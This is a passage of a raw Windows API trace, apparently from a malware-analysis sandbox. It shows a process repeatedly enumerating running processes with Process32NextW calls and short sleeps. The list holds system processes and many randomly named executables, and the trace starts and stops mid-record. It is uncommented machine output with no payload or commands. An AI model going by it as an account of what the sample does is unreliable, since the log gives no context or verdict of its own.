Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.521] CloseHandle (hObject=0xc4) returned 1 [0110.521] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.527] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 
[0110.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.535] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.540] Process32NextW 
(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.547] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) 
returned 1 [0110.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.580] CloseHandle (hObject=0xbc) returned 1 [0110.580] Sleep (dwMilliseconds=0x12c) [0110.878] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.883] Process32FirstW 
(in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.888] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, 